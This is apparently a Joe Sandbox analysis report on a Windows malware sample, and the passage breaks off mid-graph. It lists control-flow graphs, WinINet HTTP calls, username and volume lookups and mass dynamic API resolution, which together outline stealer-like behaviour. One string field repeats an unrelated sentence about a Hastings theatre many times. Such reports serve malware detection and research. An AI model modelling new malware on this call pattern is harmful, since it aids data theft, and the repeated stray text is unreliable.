                                    • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                    • API String ID: 1542196881-2218711628
                                    • Opcode ID: 0c86065848020d2f375b1cee2cb2e25bf7069e4e33e9c853b009f69b25ea5755
                                    • Instruction ID: 01ad97414d9b14cb3520f285dc21da7bcb5f3f203655873d9096e3a248cd8151
                                    • Opcode Fuzzy Hash: 0c86065848020d2f375b1cee2cb2e25bf7069e4e33e9c853b009f69b25ea5755
                                    • Instruction Fuzzy Hash: 9441F4607E26146EEF7AFBA6886AFFD766BDF43708F409044EC2052285CBF46508C5B5

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1033 1962d0-19635b call 1aaab0 call 194800 call 1aaa50 InternetOpenA StrCmpCA 1040 19635d 1033->1040 1041 196364-196368 1033->1041 1040->1041 1042 196559-196575 call 1aaab0 call 1aab10 * 2 1041->1042 1043 19636e-196392 InternetConnectA 1041->1043 1062 196578-19657d 1042->1062 1045 196398-19639c 1043->1045 1046 19654f-196553 InternetCloseHandle 1043->1046 1048 1963aa 1045->1048 1049 19639e-1963a8 1045->1049 1046->1042 1051 1963b4-1963e2 HttpOpenRequestA 1048->1051 1049->1051 1053 1963e8-1963ec 1051->1053 1054 196545-196549 InternetCloseHandle 1051->1054 1056 1963ee-19640f InternetSetOptionA 1053->1056 1057 196415-196455 HttpSendRequestA HttpQueryInfoA 1053->1057 1054->1046 1056->1057 1059 19647c-19649b call 1a8ad0 1057->1059 1060 196457-196477 call 1aaa50 call 1aab10 * 2 1057->1060 1067 196519-196539 call 1aaa50 call 1aab10 * 2 1059->1067 1068 19649d-1964a4 1059->1068 1060->1062 1067->1062 1071 196517-19653f InternetCloseHandle 1068->1071 1072 1964a6-1964d0 InternetReadFile 1068->1072 1071->1054 1076 1964db 1072->1076 1077 1964d2-1964d9 1072->1077 1076->1071 1077->1076 1080 1964dd-196515 call 1aacc0 call 1aabb0 call 1aab10 1077->1080 1080->1072
                                    APIs
                                      • Part of subcall function 001AAAB0: lstrcpy.KERNEL32(?,00000000), ref: 001AAAF6
                                      • Part of subcall function 00194800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00194889
                                      • Part of subcall function 00194800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00194899
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                    • InternetOpenA.WININET(001B0DFF,00000001,00000000,00000000,00000000), ref: 00196331
                                    • StrCmpCA.SHLWAPI(?,00E2EBB0), ref: 00196353
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00196385
                                    • HttpOpenRequestA.WININET(00000000,GET,?,00E2E2C0,00000000,00000000,00400100,00000000), ref: 001963D5
                                    • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0019640F
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00196421
                                    • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 0019644D
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 001964BD
                                    • InternetCloseHandle.WININET(00000000), ref: 0019653F
                                    • InternetCloseHandle.WININET(00000000), ref: 00196549
                                    • InternetCloseHandle.WININET(00000000), ref: 00196553
                                    Strings
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                    • String ID: ERROR$ERROR$GET
                                    • API String ID: 3749127164-2509457195
                                    • Opcode ID: e7d073c3877c9b14c1bd883f82d836827eedd623f16f0e46fa57878b3ab87ace
                                    • Instruction ID: f8fa205917f9520c9ac999ef2e8b7558433401f47195155df94b7861d5449e04
                                    • Opcode Fuzzy Hash: e7d073c3877c9b14c1bd883f82d836827eedd623f16f0e46fa57878b3ab87ace
                                    • Instruction Fuzzy Hash: 47714C75A00218EBDF24DFA0CC59BEE7778BF55700F5081A9F10A6B194DBB46A84CF61

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1356 1a7690-1a76da GetWindowsDirectoryA 1357 1a76dc 1356->1357 1358 1a76e3-1a7757 GetVolumeInformationA call 1a8e90 * 3 1356->1358 1357->1358 1365 1a7768-1a776f 1358->1365 1366 1a778c-1a77a7 GetProcessHeap RtlAllocateHeap 1365->1366 1367 1a7771-1a778a call 1a8e90 1365->1367 1369 1a77b8-1a77e8 wsprintfA call 1aaa50 1366->1369 1370 1a77a9-1a77b6 call 1aaa50 1366->1370 1367->1365 1377 1a780e-1a781e 1369->1377 1370->1377
                                    APIs
                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 001A76D2
                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001A770F
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001A7793
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 001A779A
                                    • wsprintfA.USER32 ref: 001A77D0
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                    Strings
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                    • String ID: :$C$\
                                    • API String ID: 1544550907-3809124531
                                    • Opcode ID: aa2c8893c575c618d0918af9162daa2acfddea06f3524128ff5c5a2b463be2b9
                                    • Instruction ID: 7216b04ab98fe0b943b7461f8edbd50982ee102fc2b6004c87fc29eab367cff1
                                    • Opcode Fuzzy Hash: aa2c8893c575c618d0918af9162daa2acfddea06f3524128ff5c5a2b463be2b9
                                    • Instruction Fuzzy Hash: 3B41D6B5D04348DBDB10DFA4DC85BDEBBB8AF19704F104099F609AB280E7746B44CBA5
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001911B7), ref: 001A7A10
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 001A7A17
                                    • GetUserNameA.ADVAPI32(00000104,00000104), ref: 001A7A2F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateNameProcessUser
                                    • String ID:
                                    • API String ID: 1296208442-0
                                    • Opcode ID: 5cf4bf21cbfb1dc011097c9a61b6b579f486bb21fcd84d30beda832003774476
                                    • Instruction ID: 5fa9bc4bf7418575154661a117b6cc143438bd47d240c35985142a4c57fe323f
                                    • Opcode Fuzzy Hash: 5cf4bf21cbfb1dc011097c9a61b6b579f486bb21fcd84d30beda832003774476
                                    • Instruction Fuzzy Hash: 22F04FB5948209EBC704DF98DD45BAEBBB8EB05B15F10026AF615A3680D7B515008BA1
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitInfoProcessSystem
                                    • String ID:
                                    • API String ID: 752954902-0
                                    • Opcode ID: daf5bd354dd37d9d6c04449185268579560a03cad1fa7ba7b5b1b5d964426fa7
                                    • Instruction ID: 9fe134361d53ae2ed2de76c14646e9a24ba1d49ef471603c8e6506b4c3a087a2
                                    • Opcode Fuzzy Hash: daf5bd354dd37d9d6c04449185268579560a03cad1fa7ba7b5b1b5d964426fa7
                                    • Instruction Fuzzy Hash: 9BD05E7490430CABCB00DFE098496EDBB78BB09219F0005A5DD0562340EB705481CA6A

                                    Control-flow Graph

                                    control_flow_graph 633 1a9f20-1a9f2a 634 1a9f30-1aa341 GetProcAddress * 43 633->634 635 1aa346-1aa3da LoadLibraryA * 8 633->635 634->635 636 1aa3dc-1aa451 GetProcAddress * 5 635->636 637 1aa456-1aa45d 635->637 636->637 638 1aa463-1aa521 GetProcAddress * 8 637->638 639 1aa526-1aa52d 637->639 638->639 640 1aa5a8-1aa5af 639->640 641 1aa52f-1aa5a3 GetProcAddress * 5 639->641 642 1aa647-1aa64e 640->642 643 1aa5b5-1aa642 GetProcAddress * 6 640->643 641->640 644 1aa72f-1aa736 642->644 645 1aa654-1aa72a GetProcAddress * 9 642->645 643->642 646 1aa738-1aa7ad GetProcAddress * 5 644->646 647 1aa7b2-1aa7b9 644->647 645->644 646->647 648 1aa7bb-1aa7e7 GetProcAddress * 2 647->648 649 1aa7ec-1aa7f3 647->649 648->649 650 1aa825-1aa82c 649->650 651 1aa7f5-1aa820 GetProcAddress * 2 649->651 652 1aa922-1aa929 650->652 653 1aa832-1aa91d GetProcAddress * 10 650->653 651->650 654 1aa92b-1aa988 GetProcAddress * 4 652->654 655 1aa98d-1aa994 652->655 653->652 654->655 656 1aa9ae-1aa9b5 655->656 657 1aa996-1aa9a9 GetProcAddress 655->657 658 1aaa18-1aaa19 656->658 659 1aa9b7-1aaa13 GetProcAddress * 4 656->659 657->656 659->658
                                    APIs
                                    • GetProcAddress.KERNEL32(75900000,00E14F80), ref: 001A9F3D
                                    • GetProcAddress.KERNEL32(75900000,00E150C0), ref: 001A9F55
                                    • GetProcAddress.KERNEL32(75900000,00E294A0), ref: 001A9F6E
                                    • GetProcAddress.KERNEL32(75900000,00E294E8), ref: 001A9F86
                                    • GetProcAddress.KERNEL32(75900000,00E2D268), ref: 001A9F9E
                                    • GetProcAddress.KERNEL32(75900000,00E2D340), ref: 001A9FB7
                                    • GetProcAddress.KERNEL32(75900000,00E1AC70), ref: 001A9FCF
                                    • GetProcAddress.KERNEL32(75900000,00E2D4F0), ref: 001A9FE7
                                    • GetProcAddress.KERNEL32(75900000,00E2D4C0), ref: 001AA000
                                    • GetProcAddress.KERNEL32(75900000,00E2D238), ref: 001AA018
                                    • GetProcAddress.KERNEL32(75900000,00E2D280), ref: 001AA030
                                    • GetProcAddress.KERNEL32(75900000,00E14E00), ref: 001AA049
                                    • GetProcAddress.KERNEL32(75900000,00E14E20), ref: 001AA061
                                    • GetProcAddress.KERNEL32(75900000,00E14E40), ref: 001AA079
                                    • GetProcAddress.KERNEL32(75900000,00E14E60), ref: 001AA092
                                    • GetProcAddress.KERNEL32(75900000,00E2D2B0), ref: 001AA0AA
                                    • GetProcAddress.KERNEL32(75900000,00E2D310), ref: 001AA0C2
                                    • GetProcAddress.KERNEL32(75900000,00E1ACC0), ref: 001AA0DB
                                    • GetProcAddress.KERNEL32(75900000,00E14E80), ref: 001AA0F3
                                    • GetProcAddress.KERNEL32(75900000,00E2D3A0), ref: 001AA10B
                                    • GetProcAddress.KERNEL32(75900000,00E2D2E0), ref: 001AA124
                                    • GetProcAddress.KERNEL32(75900000,00E2D250), ref: 001AA13C
                                    • GetProcAddress.KERNEL32(75900000,00E2D3B8), ref: 001AA154
                                    • GetProcAddress.KERNEL32(75900000,00E14EA0), ref: 001AA16D
                                    • GetProcAddress.KERNEL32(75900000,00E2D328), ref: 001AA185
                                    • GetProcAddress.KERNEL32(75900000,00E2D460), ref: 001AA19D
                                    • GetProcAddress.KERNEL32(75900000,00E2D3D0), ref: 001AA1B6
                                    • GetProcAddress.KERNEL32(75900000,00E2D2C8), ref: 001AA1CE
                                    • GetProcAddress.KERNEL32(75900000,00E2D3E8), ref: 001AA1E6
                                    • GetProcAddress.KERNEL32(75900000,00E2D298), ref: 001AA1FF
                                    • GetProcAddress.KERNEL32(75900000,00E2D358), ref: 001AA217
                                    • GetProcAddress.KERNEL32(75900000,00E2D388), ref: 001AA22F
                                    • GetProcAddress.KERNEL32(75900000,00E2D400), ref: 001AA248
                                    • GetProcAddress.KERNEL32(75900000,00E2AA78), ref: 001AA260
                                    • GetProcAddress.KERNEL32(75900000,00E2D418), ref: 001AA278
                                    • GetProcAddress.KERNEL32(75900000,00E2D430), ref: 001AA291
                                    • GetProcAddress.KERNEL32(75900000,00E14EC0), ref: 001AA2A9
                                    • GetProcAddress.KERNEL32(75900000,00E2D2F8), ref: 001AA2C1
                                    • GetProcAddress.KERNEL32(75900000,00E14FE0), ref: 001AA2DA
                                    • GetProcAddress.KERNEL32(75900000,00E2D4D8), ref: 001AA2F2
                                    • GetProcAddress.KERNEL32(75900000,00E2D448), ref: 001AA30A
                                    • GetProcAddress.KERNEL32(75900000,00E15000), ref: 001AA323
                                    • GetProcAddress.KERNEL32(75900000,00E15020), ref: 001AA33B
                                    • LoadLibraryA.KERNEL32(00E2D478,?,001A5EF3,001B0AEB,?,?,?,?,?,?,?,?,?,?,001B0AEA,001B0AE7), ref: 001AA34D
                                    • LoadLibraryA.KERNEL32(00E2D490,?,001A5EF3,001B0AEB,?,?,?,?,?,?,?,?,?,?,001B0AEA,001B0AE7), ref: 001AA35E
                                    • LoadLibraryA.KERNEL32(00E2D370,?,001A5EF3,001B0AEB,?,?,?,?,?,?,?,?,?,?,001B0AEA,001B0AE7), ref: 001AA370
                                    • LoadLibraryA.KERNEL32(00E2D4A8,?,001A5EF3,001B0AEB,?,?,?,?,?,?,?,?,?,?,001B0AEA,001B0AE7), ref: 001AA382
                                    • LoadLibraryA.KERNEL32(00E2D508,?,001A5EF3,001B0AEB,?,?,?,?,?,?,?,?,?,?,001B0AEA,001B0AE7), ref: 001AA393
                                    • LoadLibraryA.KERNEL32(00E2D220,?,001A5EF3,001B0AEB,?,?,?,?,?,?,?,?,?,?,001B0AEA,001B0AE7), ref: 001AA3A5
                                    • LoadLibraryA.KERNEL32(00E2D550,?,001A5EF3,001B0AEB,?,?,?,?,?,?,?,?,?,?,001B0AEA,001B0AE7), ref: 001AA3B7
                                    • LoadLibraryA.KERNEL32(00E2D5E0,?,001A5EF3,001B0AEB,?,?,?,?,?,?,?,?,?,?,001B0AEA,001B0AE7), ref: 001AA3C8
                                    • GetProcAddress.KERNEL32(75FD0000,00E15280), ref: 001AA3EA
                                    • GetProcAddress.KERNEL32(75FD0000,00E2D640), ref: 001AA402
                                    • GetProcAddress.KERNEL32(75FD0000,00E29140), ref: 001AA41A
                                    • GetProcAddress.KERNEL32(75FD0000,00E2D520), ref: 001AA433
                                    • GetProcAddress.KERNEL32(75FD0000,00E15420), ref: 001AA44B
                                    • GetProcAddress.KERNEL32(73B30000,00E1AD88), ref: 001AA470
                                    • GetProcAddress.KERNEL32(73B30000,00E15340), ref: 001AA489
                                    • GetProcAddress.KERNEL32(73B30000,00E1AA40), ref: 001AA4A1
                                    • GetProcAddress.KERNEL32(73B30000,00E2D5B0), ref: 001AA4B9
                                    • GetProcAddress.KERNEL32(73B30000,00E2D688), ref: 001AA4D2
                                    • GetProcAddress.KERNEL32(73B30000,00E15540), ref: 001AA4EA
                                    • GetProcAddress.KERNEL32(73B30000,00E15200), ref: 001AA502
                                    • GetProcAddress.KERNEL32(73B30000,00E2D6B8), ref: 001AA51B
                                    • GetProcAddress.KERNEL32(763B0000,00E153E0), ref: 001AA53C
                                    • GetProcAddress.KERNEL32(763B0000,00E15480), ref: 001AA554
                                    • GetProcAddress.KERNEL32(763B0000,00E2D5F8), ref: 001AA56D
                                    • GetProcAddress.KERNEL32(763B0000,00E2D538), ref: 001AA585
                                    • GetProcAddress.KERNEL32(763B0000,00E154C0), ref: 001AA59D
                                    • GetProcAddress.KERNEL32(750F0000,00E1AB80), ref: 001AA5C3
                                    • GetProcAddress.KERNEL32(750F0000,00E1ACE8), ref: 001AA5DB
                                    • GetProcAddress.KERNEL32(750F0000,00E2D6A0), ref: 001AA5F3
                                    • GetProcAddress.KERNEL32(750F0000,00E15260), ref: 001AA60C
                                    • GetProcAddress.KERNEL32(750F0000,00E15320), ref: 001AA624
                                    • GetProcAddress.KERNEL32(750F0000,00E1ABA8), ref: 001AA63C
                                    • GetProcAddress.KERNEL32(75A50000,00E2D568), ref: 001AA662
                                    • GetProcAddress.KERNEL32(75A50000,00E153C0), ref: 001AA67A
                                    • GetProcAddress.KERNEL32(75A50000,00E29250), ref: 001AA692
                                    • GetProcAddress.KERNEL32(75A50000,00E2D5C8), ref: 001AA6AB
                                    • GetProcAddress.KERNEL32(75A50000,00E2D580), ref: 001AA6C3
                                    • GetProcAddress.KERNEL32(75A50000,00E151A0), ref: 001AA6DB
                                    • GetProcAddress.KERNEL32(75A50000,00E15240), ref: 001AA6F4
                                    • GetProcAddress.KERNEL32(75A50000,00E2D6D0), ref: 001AA70C
                                    • GetProcAddress.KERNEL32(75A50000,00E2D610), ref: 001AA724
                                    • GetProcAddress.KERNEL32(75070000,00E15300), ref: 001AA746
                                    • GetProcAddress.KERNEL32(75070000,00E2D658), ref: 001AA75E
                                    • GetProcAddress.KERNEL32(75070000,00E2D598), ref: 001AA776
                                    • GetProcAddress.KERNEL32(75070000,00E2D628), ref: 001AA78F
                                    • GetProcAddress.KERNEL32(75070000,00E2D670), ref: 001AA7A7
                                    • GetProcAddress.KERNEL32(74E50000,00E15520), ref: 001AA7C8
                                    • GetProcAddress.KERNEL32(74E50000,00E15380), ref: 001AA7E1
                                    • GetProcAddress.KERNEL32(75320000,00E151C0), ref: 001AA802
                                    • GetProcAddress.KERNEL32(75320000,00E2CF98), ref: 001AA81A
                                    • GetProcAddress.KERNEL32(6F060000,00E15360), ref: 001AA840
                                    • GetProcAddress.KERNEL32(6F060000,00E152A0), ref: 001AA858
                                    • GetProcAddress.KERNEL32(6F060000,00E15400), ref: 001AA870
                                    • GetProcAddress.KERNEL32(6F060000,00E2D028), ref: 001AA889
                                    • GetProcAddress.KERNEL32(6F060000,00E153A0), ref: 001AA8A1
                                    • GetProcAddress.KERNEL32(6F060000,00E151E0), ref: 001AA8B9
                                    • GetProcAddress.KERNEL32(6F060000,00E15440), ref: 001AA8D2
                                    • GetProcAddress.KERNEL32(6F060000,00E15220), ref: 001AA8EA
                                    • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 001AA901
                                    • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 001AA917
                                    • GetProcAddress.KERNEL32(74E00000,00E2D190), ref: 001AA939
                                    • GetProcAddress.KERNEL32(74E00000,00E291F0), ref: 001AA951
                                    • GetProcAddress.KERNEL32(74E00000,00E2CFC8), ref: 001AA969
                                    • GetProcAddress.KERNEL32(74E00000,00E2D148), ref: 001AA982
                                    • GetProcAddress.KERNEL32(74DF0000,00E152E0), ref: 001AA9A3
                                    • GetProcAddress.KERNEL32(6F9C0000,00E2D100), ref: 001AA9C4
                                    • GetProcAddress.KERNEL32(6F9C0000,00E15460), ref: 001AA9DD
                                    • GetProcAddress.KERNEL32(6F9C0000,00E2CFB0), ref: 001AA9F5
                                    • GetProcAddress.KERNEL32(6F9C0000,00E2D088), ref: 001AAA0D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: N$ P$ R$ S$ T$ U$@N$@R$@S$@T$@U$HttpQueryInfoA$InternetSetOptionA$`N$`R$`S$`T$O$Q$R$S
                                    • API String ID: 2238633743-2076794032
                                    • Opcode ID: 8f1cb4d0c5b88cc27ad3014067ae4659a5ce6de72b8865f75f2cf17bfa8927e5
                                    • Instruction ID: 70d73d7f58904c9b4fcdeea591682b138d85e57cc6b36341d1ab8d3482cf9bb2
                                    • Opcode Fuzzy Hash: 8f1cb4d0c5b88cc27ad3014067ae4659a5ce6de72b8865f75f2cf17bfa8927e5
                                    • Instruction Fuzzy Hash: 846232B55182009FC344DFA8EC989967BB9B74E709311867BF909C3370FBB59940CB6A

                                    Control-flow Graph

                                    control_flow_graph 801 1948d0-194992 call 1aaab0 call 194800 call 1aaa50 * 5 InternetOpenA StrCmpCA 816 19499b-19499f 801->816 817 194994 801->817 818 194f1b-194f43 InternetCloseHandle call 1aade0 call 19a210 816->818 819 1949a5-194b1d call 1a8cf0 call 1aac30 call 1aabb0 call 1aab10 * 2 call 1aacc0 call 1aabb0 call 1aab10 call 1aacc0 call 1aabb0 call 1aab10 call 1aac30 call 1aabb0 call 1aab10 call 1aacc0 call 1aabb0 call 1aab10 call 1aacc0 call 1aabb0 call 1aab10 call 1aacc0 call 1aac30 call 1aabb0 call 1aab10 * 2 InternetConnectA 816->819 817->816 829 194f82-194ff2 call 1a8b20 * 2 call 1aaab0 call 1aab10 * 8 818->829 830 194f45-194f7d call 1aab30 call 1aacc0 call 1aabb0 call 1aab10 818->830 819->818 905 194b23-194b27 819->905 830->829 906 194b29-194b33 905->906 907 194b35 905->907 908 194b3f-194b72 HttpOpenRequestA 906->908 907->908 909 194b78-194e78 call 1aacc0 call 1aabb0 call 1aab10 call 1aac30 call 1aabb0 call 1aab10 call 1aacc0 call 1aabb0 call 1aab10 call 1aacc0 call 1aabb0 call 1aab10 call 1aacc0 call 1aabb0 call 1aab10 call 1aacc0 call 1aabb0 call 1aab10 call 1aac30 call 1aabb0 call 1aab10 call 1aacc0 call 1aabb0 call 1aab10 call 1aacc0 call 1aabb0 call 1aab10 call 1aac30 call 1aabb0 call 1aab10 call 1aacc0 call 1aabb0 call 1aab10 call 1aacc0 call 1aabb0 call 1aab10 call 1aacc0 call 1aabb0 call 1aab10 call 1aacc0 call 1aabb0 call 1aab10 call 1aac30 call 